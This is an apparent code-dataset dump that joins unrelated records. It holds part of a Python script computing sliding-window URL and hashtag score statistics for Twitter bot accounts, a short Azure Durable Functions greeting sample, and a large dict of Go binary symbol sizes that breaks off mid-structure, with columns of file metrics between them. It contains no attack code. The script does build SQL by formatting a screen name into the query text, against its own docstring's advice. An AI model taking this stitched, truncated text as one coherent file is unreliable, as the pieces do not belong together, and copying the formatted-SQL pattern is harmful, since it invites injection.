AVG(friend_tw_scores.url_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS url_mean,
VARIANCE(friend_tw_scores.url_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS url_var,
count(friend_tw_scores.url_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS url_tw_count
FROM (
SELECT
DISTINCT usr_timeline.tweet_id,
conn2.t_usr_id_conn,
usr_timeline.url_score,
date_trunc('day', conn2.time) AS day,
usr_timeline.created_at
FROM
(SELECT conn.t_usr_id_conn, conn.time
FROM bot, connections conn
WHERE bot.twitter_user_id = conn.t_usr_id_ego
AND conn.time < DATE '2019-12-02'
AND conn.conn_type is false
AND conn.conn_tweet_update_time is not null
AND bot.screen_name = '{}'
AND conn.no_connctions is false) as conn2,
tweet as usr_timeline
WHERE
usr_timeline.user_id = conn2.t_usr_id_conn
AND usr_timeline.url_score is not null
AND conn2.time >= usr_timeline.created_at
ORDER BY usr_timeline.created_at
) AS friend_tw_scores
order by friend_tw_scores.day;
"""
HASHTAG_FRIEND_USR_TIMELINE = """
SELECT
distinct friend_tw_scores.day,
AVG(friend_tw_scores.hashtag_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS hashtag_mean,
VARIANCE(friend_tw_scores.hashtag_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS hashtag_var,
count(friend_tw_scores.hashtag_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS hashtag_tw_count
FROM (
SELECT
DISTINCT usr_timeline.tweet_id,
conn2.t_usr_id_conn,
usr_timeline.hashtag_score,
date_trunc('day', conn2.time) AS day,
usr_timeline.created_at
FROM
(SELECT conn.t_usr_id_conn, conn.time
FROM bot, connections conn
WHERE bot.twitter_user_id = conn.t_usr_id_ego
AND conn.time < DATE '2019-12-02'
AND conn.conn_type is false
AND conn.conn_tweet_update_time is not null
AND bot.screen_name = '{}'
AND conn.no_connctions is false) as conn2,
tweet as usr_timeline
WHERE
usr_timeline.user_id = conn2.t_usr_id_conn
AND usr_timeline.hashtag_score is not null
AND conn2.time >= usr_timeline.created_at
ORDER BY usr_timeline.created_at
) AS friend_tw_scores
order by friend_tw_scores.day;
"""
URL_FOLLOWER_USR_TIMELINE = """
SELECT
distinct friend_tw_scores.day,
AVG(friend_tw_scores.url_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS url_mean,
VARIANCE(friend_tw_scores.url_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS url_var,
count(friend_tw_scores.url_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS url_tw_count
FROM (
SELECT
DISTINCT usr_timeline.tweet_id,
conn2.t_usr_id_conn,
usr_timeline.url_score,
date_trunc('day', conn2.time) AS day,
usr_timeline.created_at
FROM
(SELECT conn.t_usr_id_conn, conn.time
FROM bot, connections conn
WHERE bot.twitter_user_id = conn.t_usr_id_ego
AND conn.time < DATE '2019-12-02'
AND conn.conn_type is true
AND conn.conn_tweet_update_time is not null
AND bot.screen_name = '{}'
AND conn.no_connctions is false) as conn2,
tweet as usr_timeline
WHERE
usr_timeline.user_id = conn2.t_usr_id_conn
AND usr_timeline.url_score is not null
AND conn2.time >= usr_timeline.created_at
ORDER BY usr_timeline.created_at
) AS friend_tw_scores
order by friend_tw_scores.day;
"""
HASHTAG_FOLLOWER_USR_TIMELINE = """
SELECT
distinct friend_tw_scores.day,
AVG(friend_tw_scores.hashtag_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS hashtag_mean,
VARIANCE(friend_tw_scores.hashtag_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS hashtag_var,
count(friend_tw_scores.hashtag_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS hashtag_tw_count
FROM (
SELECT
DISTINCT usr_timeline.tweet_id,
conn2.t_usr_id_conn,
usr_timeline.hashtag_score,
date_trunc('day', conn2.time) AS day,
usr_timeline.created_at
FROM
(SELECT conn.t_usr_id_conn, conn.time
FROM bot, connections conn
WHERE bot.twitter_user_id = conn.t_usr_id_ego
AND conn.time < DATE '2019-12-02'
AND conn.conn_type is true
AND conn.conn_tweet_update_time is not null
AND bot.screen_name = '{}'
AND conn.no_connctions is false) as conn2,
tweet as usr_timeline
WHERE
usr_timeline.user_id = conn2.t_usr_id_conn
AND usr_timeline.hashtag_score is not null
AND conn2.time >= usr_timeline.created_at
ORDER BY usr_timeline.created_at
) AS friend_tw_scores
order by friend_tw_scores.day;
"""
def DBExecute(
        conn, command,
        param_lst=None, need_commit=False,
        return_id=False):
    """Execute a SQL *command* on a psycopg2 connection.

    :param conn: open psycopg2 connection; falsy -> returns False immediately.
    :param command: SQL text, optionally with placeholders.
    :param param_lst: parameters bound to the placeholders (parameterized
        execution; never interpolate values into `command` yourself).
    :param need_commit: True for write statements that must be committed.
    :param return_id: True to return the first column of the first row
        (e.g. `RETURNING id`).
    :return: fetched rows / id on success, True for a committed write with
        no id requested, False on any database error or missing connection.
    """
    if not conn:
        # Nothing to execute against.
        return False
    result = True
    # BUG FIX: `cur` must be bound before the try block.  Previously, if
    # `conn.cursor()` raised (or the early `return False` lived inside the
    # try), the `finally` clause referenced an unbound `cur` and raised
    # UnboundLocalError, masking the real outcome.
    cur = None
    try:
        cur = conn.cursor()
        if param_lst:
            cur.execute(command, param_lst)
        else:
            cur.execute(command)
        if not need_commit:
            result = cur.fetchone()[0] if return_id else cur.fetchall()
        else:
            if return_id:
                result = cur.fetchone()[0]
            conn.commit()
    except (Exception, psycopg2.DatabaseError) as error:
        result = False
        print(error)
        conn.rollback()
    finally:
        if cur:
            cur.close()
    return result
def GetTimeSerisMetricForOneSeed(seeds, feature, comm, column_names, filename_prefix, bots_mask, db_conn=None):
    """Run sliding-window query *comm* for each bot and export one CSV each.

    :param seeds: iterable of bot screen names to query.
    :param feature: feature label ('url' or 'hashtag'), used only for logging.
    :param comm: SQL template with one '{}' placeholder for the screen name.
    :param column_names: column labels for the query's result set.
    :param filename_prefix: prefix of the output CSV file name.
    :param bots_mask: screen name -> anonymized label for output file names.
    :param db_conn: open psycopg2 connection; falsy -> returns False.
    :return: dict mapping screen name -> per-bot DataFrame, or False when
        no connection was supplied.
    """
    if not db_conn:
        return False
    rst_bot_to_df = {}
    for seed in seeds:
        print(feature, bots_mask.get(seed, seed), filename_prefix)
        result = DBExecute(
            db_conn, comm.format(seed), need_commit=False,
            return_id=False)
        result_df = pd.DataFrame(np.array(result), columns=column_names)
        # The window query emits one row per (day, window) pair; keep only
        # the final window value recorded for each day.
        result_df = result_df.drop_duplicates(subset=['date'], keep='last')
        result_df.to_csv('data/time_series/%s_%s.csv' % (filename_prefix, bots_mask.get(seed, seed)), index=False)
        rst_bot_to_df[seed] = result_df
    # BUG FIX: the accumulated dict was built but never returned, so callers
    # could not reuse the frames without re-reading the CSVs.
    return rst_bot_to_df
def generate_all_time_series(db_conn=None, INIT_SEED_MAP=None, bots_mask=None):
    """Export URL and hashtag sliding-window time series for every seed group.

    For each seed -> bot-accounts entry, runs the eight sliding-window SQL
    templates (url/hashtag x home/user/friend/follower timelines) via
    GetTimeSerisMetricForOneSeed, writing one CSV per bot and query.

    :param db_conn: open psycopg2 connection; when falsy a new connection to
        the local ``drifter`` database is opened.  NOTE: the connection is
        closed before returning, even when supplied by the caller (preserved
        from the original behavior).
    :param INIT_SEED_MAP: mapping seed screen name -> list of bot screen
        names (default: empty mapping).
    :param bots_mask: mapping bot screen name -> anonymized label used in
        output file names (default: empty mapping).
    """
    # FIX: mutable default arguments ({}) replaced with None sentinels;
    # behavior is unchanged because the dicts were never mutated.
    seed_map = INIT_SEED_MAP if INIT_SEED_MAP is not None else {}
    mask = bots_mask if bots_mask is not None else {}
    if not db_conn:
        db_conn = psycopg2.connect('dbname=drifter')
    for seed, bot_accounts in seed_map.items():
        print(seed)
        # (feature, SQL template, output-file suffix), in the original call
        # order: url then hashtag, each over home/user/friend/follower.
        specs = [
            ('url', URL_HOME_TL_SLIDING_WIN_FOR_EACH_BOT, 'sliced_home_tl'),
            ('url', URL_USER_TL_SLIDING_WIN_FOR_EACH_BOT, 'sliced_usr_tl'),
            ('url', URL_FRIEND_USR_TIMELINE, 'sliced_friend_usr_tl'),
            ('url', URL_FOLLOWER_USR_TIMELINE, 'sliced_follower_usr_tl'),
            ('hashtag', HASHTAG_HOME_TL_SLIDING_WIN_FOR_EACH_BOT, 'sliced_home_tl'),
            ('hashtag', HASHTAG_USER_TL_SLIDING_WIN_FOR_EACH_BOT, 'sliced_usr_tl'),
            ('hashtag', HASHTAG_FRIEND_USR_TIMELINE, 'sliced_friend_usr_tl'),
            ('hashtag', HASHTAG_FOLLOWER_USR_TIMELINE, 'sliced_follower_usr_tl'),
        ]
        for feature, template, suffix in specs:
            GetTimeSerisMetricForOneSeed(
                bot_accounts, feature, template,
                ['date', feature + '_mean', feature + '_var', feature + '_count'],
                '%s_%s_%s' % (feature, seed, suffix),
                db_conn=db_conn,
                bots_mask=mask,
            )
    if db_conn:
        db_conn.close()
def main():
    # Entry point: pass db_conn=None so a fresh connection to the local
    # 'drifter' database is opened, and export all configured time series
    # with anonymized bot names.
    generate_all_time_series(None, INIT_SEED_MAP, BOT_NAME_MASK)


if __name__ == "__main__":
    main()
| 33.925059
| 111
| 0.639721
| 1,991
| 14,486
| 4.334003
| 0.081366
| 0.073937
| 0.058408
| 0.061189
| 0.855603
| 0.836366
| 0.829876
| 0.821068
| 0.815274
| 0.815274
| 0
| 0.014469
| 0.284344
| 14,486
| 426
| 112
| 34.004695
| 0.817884
| 0.007525
| 0
| 0.696335
| 0
| 0
| 0.725613
| 0.142768
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.013089
| null | null | 0.007853
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
36afc57e5ec3e2295c845a2acf12569399335bcd
| 133
|
py
|
Python
|
samples/sequence/Hello/__init__.py
|
gled4er/azure-functions-durable-python
|
f212d4c32372e093a6d4d607ba40a2f443372f43
|
[
"MIT"
] | null | null | null |
samples/sequence/Hello/__init__.py
|
gled4er/azure-functions-durable-python
|
f212d4c32372e093a6d4d607ba40a2f443372f43
|
[
"MIT"
] | null | null | null |
samples/sequence/Hello/__init__.py
|
gled4er/azure-functions-durable-python
|
f212d4c32372e093a6d4d607ba40a2f443372f43
|
[
"MIT"
] | null | null | null |
# To be discussed
from durable_functions.models import activity_trigger
def run(name: activity_trigger):
    """Durable Functions activity: build and return a greeting for *name*."""
    greeting = 'Hello {}'.format(name)
    return greeting
| 22.166667
| 53
| 0.781955
| 19
| 133
| 5.315789
| 0.842105
| 0.29703
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 133
| 5
| 54
| 26.6
| 0.885965
| 0.112782
| 0
| 0
| 0
| 0
| 0.103448
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
36e817883c9350adc3296a65cb3d1ea46f82bb89
| 90,366
|
py
|
Python
|
scripts/go-binsize-viz/example-data/helloworld/hello.py
|
ganeshkumarsv/datadog-lambda-extension
|
e6a7dad65a264478b5c1db9bb2195064c496b1cc
|
[
"Apache-2.0"
] | 9
|
2021-06-04T07:29:24.000Z
|
2022-03-21T00:43:34.000Z
|
scripts/go-binsize-viz/example-data/helloworld/hello.py
|
ganeshkumarsv/datadog-lambda-extension
|
e6a7dad65a264478b5c1db9bb2195064c496b1cc
|
[
"Apache-2.0"
] | 19
|
2021-05-25T13:16:51.000Z
|
2022-03-31T08:15:00.000Z
|
scripts/go-binsize-viz/example-data/helloworld/hello.py
|
ganeshkumarsv/datadog-lambda-extension
|
e6a7dad65a264478b5c1db9bb2195064c496b1cc
|
[
"Apache-2.0"
] | 1
|
2022-03-25T02:58:14.000Z
|
2022-03-25T02:58:14.000Z
|
{'children': {'go · ': {'children': {'$f32.': {'children': {'fffffffe': {'value': 4}}}, '$f64.': {'children': {'3eb0000000000000': {'value': 8}, '3fd0000000000000': {'value': 8}, '3fd3333333333333': {'value': 8}, '3fe0000000000000': {'value': 8}, '3fec000000000000': {'value': 8}, '3fee666666666666': {'value': 8}, '3ff0000000000000': {'value': 8}, '3ff199999999999a': {'value': 8}, '3ff3333333333333': {'value': 8}, '3ffe000000000000': {'value': 8}, '4014000000000000': {'value': 8}, '4024000000000000': {'value': 8}, '403a000000000000': {'value': 8}, '4059000000000000': {'value': 8}, '40f0000000000000': {'value': 8}, '43e0000000000000': {'value': 8}, '8000000000000000': {'value': 8}, 'bfd3333333333333': {'value': 8}, 'bfe62e42fefa39ef': {'value': 8}, 'fffffffffffffffe': {'value': 8}}}, 'errors.': {'children': {'(*errorString).': {'children': {'Error': {'value': 23}}}, 'New': {'value': 122}, 'go.itab.*errorString,error': {'value': 32}}}, 'fmt.': {'children': {'(*buffer).': {'children': {'WriteRune': {'value': 506}}}, '(*fmt).': {'children': {'fmtBoolean': {'value': 127}, 'fmtBx': {'value': 118}, 'fmtC': {'value': 183}, 'fmtFloat': {'value': 2202}, 'fmtInteger': {'value': 1289}, 'fmtQ': {'value': 487}, 'fmtQc': {'value': 247}, 'fmtS': {'value': 114}, 'fmtSbx': {'value': 1617}, 'fmtSx': {'value': 117}, 'fmtUnicode': {'value': 948}, 'pad': {'value': 968}, 'padString': {'value': 955}, 'truncate': {'value': 233}, 'writePadding': {'value': 391}}}, '(*pp).': {'children': {'Flag': {'value': 153}, 'Precision': {'value': 23}, 'Width': {'value': 23}, 'Write': {'value': 307}, 'badVerb': {'value': 1790}, 'catchPanic': {'value': 1375}, 'doPrintln': {'value': 487}, 'fmt0x64': {'value': 141}, 'fmtBool': {'value': 109}, 'fmtBytes': {'value': 2435}, 'fmtComplex': {'value': 573}, 'fmtFloat': {'value': 383}, 'fmtInteger': {'value': 783}, 'fmtPointer': {'value': 1456}, 'fmtString': {'value': 425}, 'free': {'value': 185}, 'handleMethods': {'value': 1205}, 'printArg': {'value': 2586}, 
'printValue': {'value': 10938}, 'unknownType': {'value': 862}}}, 'Fprintln': {'value': 242}, 'Println': {'value': 137}, 'boolError': {'value': 16}, 'complexError': {'value': 16}, 'getField': {'value': 239}, 'glob.': {'children': {'func1': {'value': 84}}}, 'init': {'value': 277}, 'initdone.': {'value': 1}, 'newPrinter': {'value': 179}, 'ppFree': {'value': 24}, 'statictmp_0': {'value': 16}, 'go.itab.*pp,fmt.State': {'value': 56}}}, 'internal/': {'children': {'poll.': {'children': {'go.itab.*TimeoutError,error': {'value': 32}, '(*FD).': {'children': {'Close': {'value': 241}, 'Init': {'value': 184}, 'Write': {'value': 912}, 'decref': {'value': 124}, 'destroy': {'value': 164}, 'writeLock': {'value': 152}, 'writeUnlock': {'value': 93}}}, '(*TimeoutError).': {'children': {'Error': {'value': 22}}}, '(*fdMutex).': {'children': {'decref': {'value': 128}, 'increfAndClose': {'value': 289}, 'rwlock': {'value': 361}, 'rwunlock': {'value': 283}}}, '(*pollDesc).': {'children': {'close': {'value': 90}, 'evict': {'value': 78}, 'init': {'value': 226}, 'prepare': {'value': 285}, 'prepareWrite': {'value': 98}, 'wait': {'value': 365}, 'waitWrite': {'value': 98}}}, 'CloseFunc': {'value': 8}, 'ErrFileClosing': {'value': 16}, 'ErrNetClosing': {'value': 16}, 'ErrNoDeadline': {'value': 16}, 'ErrTimeout': {'value': 16}, 'init': {'value': 354}, 'initdone.': {'value': 1}, 'runtime_Semacquire': {'value': 74}, 'runtime_Semrelease': {'value': 60}, 'runtime_pollClose': {'value': 223}, 'runtime_pollOpen': {'value': 293}, 'runtime_pollReset': {'value': 120}, 'runtime_pollServerInit': {'value': 62}, 'runtime_pollUnblock': {'value': 475}, 'runtime_pollWait': {'value': 295}, 'serverInit': {'value': 12}, 'statictmp_1': {'value': 16}, 'statictmp_2': {'value': 16}, 'statictmp_3': {'value': 16}, 'statictmp_4': {'value': 16}, 'statictmp_5': {'value': 16}, 'statictmp_6': {'value': 16}, 'statictmp_7': {'value': 16}}}, 'bytealg.': {'children': {'IndexByteString': {'value': 24}, 'IndexByteString.': {'children': 
{'args_stackmap': {'value': 10}}}, 'MaxLen': {'value': 8}, 'init': {'value': 92}, 'init.': {'children': {'0': {'value': 37}}}, 'initdone.': {'value': 1}}}, 'cpu.': {'children': {'ARM64': {'value': 152}, 'X86': {'value': 144}, 'cpuid': {'value': 27}, 'cpuid.': {'children': {'args_stackmap': {'value': 10}}}, 'debugOptions': {'value': 1}, 'doinit': {'value': 1045}, 'indexByte': {'value': 52}, 'initialize': {'value': 75}, 'options': {'value': 24}, 'processOptions': {'value': 554}, 'statictmp_0': {'value': 360}, 'xgetbv': {'value': 17}, 'xgetbv.': {'children': {'args_stackmap': {'value': 10}}}}}, 'syscall/': {'children': {'unix.': {'children': {'IsNonblock': {'value': 143}, 'init': {'value': 92}, 'initdone.': {'value': 1}}}}}}}, 'os.': {'children': {'go.itab.*File,io.Writer': {'value': 32}, 'go.itab.*PathError,error': {'value': 32}, '(*File).': {'children': {'Name': {'value': 29}, 'Write': {'value': 740}, 'write': {'value': 125}}}, '(*PathError).': {'children': {'Error': {'value': 217}}}, '(*file).': {'children': {'close': {'value': 496}}}, 'Args': {'value': 24}, 'ErrClosed': {'value': 16}, 'ErrExist': {'value': 16}, 'ErrInvalid': {'value': 16}, 'ErrNoDeadline': {'value': 16}, 'ErrNotExist': {'value': 16}, 'ErrPermission': {'value': 16}, 'NewFile': {'value': 149}, 'Readlink': {'value': 546}, 'Stderr': {'value': 8}, 'Stdin': {'value': 8}, 'Stdout': {'value': 8}, 'epipecheck': {'value': 105}, 'errFinished': {'value': 16}, 'executablePath': {'value': 16}, 'executablePathErr': {'value': 16}, 'glob.': {'children': {'func1': {'value': 111}}}, 'init': {'value': 1025}, 'init.': {'children': {'0': {'value': 109}}}, 'initdone.': {'value': 1}, 'newFile': {'value': 480}, 'runtime_args': {'value': 269}, 'sigpipe': {'value': 62}, 'statictmp_4': {'value': 8}}}, 'reflect.': {'children': {'go.itab.*rtype,reflect.Type': {'value': 272}, '(*ChanDir).': {'children': {'String': {'value': 119}}}, '(*Kind).': {'children': {'String': {'value': 119}}}, '(*Value).': {'children': {'Kind': 
{'value': 127}, 'Len': {'value': 127}, 'NumField': {'value': 127}, 'NumMethod': {'value': 127}, 'String': {'value': 137}}}, '(*ValueError).': {'children': {'Error': {'value': 328}}}, '(*funcType).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*funcTypeFixed128).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*funcTypeFixed16).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 
'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*funcTypeFixed32).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*funcTypeFixed4).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': 
{'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*funcTypeFixed64).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*funcTypeFixed8).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 
'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*interfaceType).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 416}, 'MethodByName': {'value': 499}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 15}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*ptrType).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 26}, 'NumMethod': {'value': 26}, 'NumOut': {'value': 26}, 'Out': {'value': 25}, 'PkgPath': {'value': 25}, 'Size': {'value': 26}, 'String': {'value': 25}, 'common': {'value': 26}, 'uncommon': {'value': 26}}}, '(*rtype).': {'children': {'Align': {'value': 15}, 'AssignableTo': {'value': 218}, 'Bits': {'value': 261}, 'ChanDir': {'value': 103}, 'Comparable': 
{'value': 31}, 'ConvertibleTo': {'value': 175}, 'Elem': {'value': 335}, 'Field': {'value': 286}, 'FieldAlign': {'value': 15}, 'FieldByIndex': {'value': 318}, 'FieldByName': {'value': 417}, 'FieldByNameFunc': {'value': 401}, 'Implements': {'value': 238}, 'In': {'value': 215}, 'IsVariadic': {'value': 107}, 'Key': {'value': 126}, 'Kind': {'value': 18}, 'Len': {'value': 103}, 'Method': {'value': 1971}, 'MethodByName': {'value': 866}, 'Name': {'value': 172}, 'NumField': {'value': 103}, 'NumIn': {'value': 103}, 'NumMethod': {'value': 102}, 'NumOut': {'value': 189}, 'Out': {'value': 265}, 'PkgPath': {'value': 202}, 'Size': {'value': 14}, 'String': {'value': 201}, 'common': {'value': 11}, 'exportedMethods': {'value': 166}, 'nameOff': {'value': 78}, 'ptrTo': {'value': 989}, 'textOff': {'value': 78}, 'typeOff': {'value': 78}, 'uncommon': {'value': 179}}}, '(*sliceType).': {'children': {'Align': {'value': 26}, 'AssignableTo': {'value': 22}, 'Bits': {'value': 26}, 'ChanDir': {'value': 26}, 'Comparable': {'value': 22}, 'ConvertibleTo': {'value': 22}, 'Elem': {'value': 25}, 'Field': {'value': 77}, 'FieldAlign': {'value': 26}, 'FieldByIndex': {'value': 77}, 'FieldByName': {'value': 85}, 'FieldByNameFunc': {'value': 85}, 'Implements': {'value': 22}, 'In': {'value': 25}, 'IsVariadic': {'value': 22}, 'Key': {'value': 25}, 'Kind': {'value': 26}, 'Len': {'value': 26}, 'Method': {'value': 68}, 'MethodByName': {'value': 73}, 'Name': {'value': 25}, 'NumField': {'value': 26}, 'NumIn': {'value': 